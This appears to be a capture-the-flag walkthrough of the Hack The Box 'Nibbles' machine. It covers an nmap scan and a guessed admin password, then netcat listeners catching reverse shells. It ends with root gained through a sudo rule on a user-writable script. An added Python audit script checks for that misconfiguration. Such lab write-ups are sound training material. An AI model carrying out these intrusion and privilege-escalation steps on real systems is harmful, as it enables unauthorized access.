This box is very straightforward and teaches hackers how to enumerate a target and research exploits that are available online.
Reconnaissance
# Nmap 7.91 scan initiated Sun Mar 14 00:25:31 2021 as: nmap -sC -sV -p22,80 -oN nibbles.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.10s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 14 00:25:42 2021 -- 1 IP address (1 host up) scanned in 11.03 seconds
After running the nmap scan, visit the server in a web browser and review the page source.
The next step is to visit the web directory as specified.
Found Login
Trying default credentials did not work, and the login also has a lockout mechanism, which means you can get banned. Nothing much here: the password is nibbles, and you have to go on what you think a system administrator with poor practices would use. We'll proceed to finding a username with GoBuster.
Set up your listener and visit the following link.
┌──(kali㉿kali)-[~/HTB/Nibbles]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 52458
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
18:46:16 up 19 min, 0 users, load average: 0.00, 0.02, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
Once your connection is established, check whether there are any files you can create and run as another user.
nibbler@Nibbles:/home/nibbler$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
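The rule above grants root on a script path inside nibbler's own home directory, so the unprivileged user controls what sudo runs. As an added example (not part of the original write-up), this Python audit parses `sudo -l` output and reports every path component that a non-trusted user owns, can write to, or can create; the function names, the constructed `SAMPLE` text and the `trusted_uids`/`root` parameters are assumptions made for illustration.

```python
import os
import re
import stat

# Constructed sample: the NOPASSWD rule from the `sudo -l` output above.
SAMPLE = """User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# "(runas) TAG: TAG: /path args, /path2" as printed by `sudo -l`.
RULE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>/.*)$")


def nopasswd_commands(sudo_l_output):
    """Return [(runas, path)] for each command on a NOPASSWD rule line."""
    found = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if m and "NOPASSWD:" in m.group("tags"):
            for cmd in m.group("cmds").split(","):
                path = next((t for t in cmd.split() if t.startswith("/")), None)
                if path:
                    found.append((m.group("runas"), path))
    return found


def weak_links(path, trusted_uids=(0,), root="/"):
    """Walk from path up to root; list components a non-trusted user controls."""
    findings, cur, root = [], os.path.abspath(path), os.path.abspath(root)
    while True:
        try:
            st = os.lstat(cur)
        except FileNotFoundError:
            findings.append((cur, "missing: anyone who can write the parent can create it"))
        else:
            if st.st_uid not in trusted_uids:
                findings.append((cur, f"owned by uid {st.st_uid}"))
            writable = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
            if writable and not stat.S_ISLNK(st.st_mode):
                findings.append((cur, "group- or world-writable"))
        if cur in (root, os.path.dirname(cur)):
            return findings
        cur = os.path.dirname(cur)


if __name__ == "__main__":
    for runas, cmd in nopasswd_commands(SAMPLE):
        for component, reason in weak_links(cmd):
            print(f"{runas} <- {cmd}: {component}: {reason}")
```

Any finding means the rule should point at a root-owned script in a root-owned directory chain, or be removed.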
Create the following folders and file, along with the Python reverse shell code.
Set up your listener and execute the created script with sudo.
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
Getting ROOT
└─$ nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.75] 36800
# whoami
root
# ls
bakmonitor.sh
monitor.sh
test.py
# cd /root
# ls
root.txt